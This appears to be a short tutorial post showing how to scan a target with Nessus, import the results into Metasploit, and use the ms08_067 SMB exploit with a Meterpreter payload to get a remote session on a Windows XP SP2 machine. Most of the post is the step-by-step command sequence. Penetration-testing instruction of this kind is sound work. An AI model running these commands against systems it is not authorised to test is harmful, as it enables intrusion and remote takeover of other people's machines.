Today I'm going to show you how to use Nessus to create a vulnerability report that Metasploit can use to tell us what our target is vulnerable against. Nessus is not included in Backtrack 4, so you either have to go to Nessus's Website or use apt-get. The command for apt-get is...
apt-get install nessus nessusdNow that you have nessus installed, you need to run "nessusd" in a terminal window. Nessusd is the server side of nessus and it holds all of the plugins. Nessusd will take quite a while to load up, but once it's done, launch the client side of nessus (found in the menu, or run "nessus" in a terminal).
NOTE: You may have to add a user. Use "nessus-adduser" for this.
Now that you have nessus running, in the "Nessusd host" tab, put in the username and password. Now hit "Log in." This should connect nessus to your nessusd server (connecting may take a while). Now go over to the "Target" tab and put in the ip address of your target. Click "Start the scan." After a while, another window will popup with your results. Save them into a file for later (e.g. /root/nessus.nbe).
Now open a terminal window and go to your Metaploit Framework directory (Mine is /pentest/exploits/framework3). Now run ./msfconsole. This will give you the Metasploit prompt and now you can create a database to load our nessus nbe file into.
db_create /root/database.dbThis will create the database in our root folder and connect to it. Now do "db_import_nessus_nbe /root/nessus.nbe" which will load in the nessus scan results.
Now do:
db_autopwn -t -xMetasploit will check the file to see what exploits will work against the machine. Now pick one of the exploits. I'm going to be using "windows/smb/ms08_067" against a windows XP SP2 machine.
use windows/smb/ms08_067(change it to your exploit). Set the payload that you want. I'm going to be using Meterpreter.
set PAYLOAD windows/meterpreter/bind_tcpNow set the ip address of your target in the RHOST variable...
set RHOST 192.168.1.113Now your ready to exploit!
exploitIf everything went well, you should now have a Meterpreter session! I've already filmed this tutorial and I'm doing a little post-production work on it and I should have it uploaded tonight. Again, if you need to contact me, you can reach me at nulbyte [-@-] gmail.com.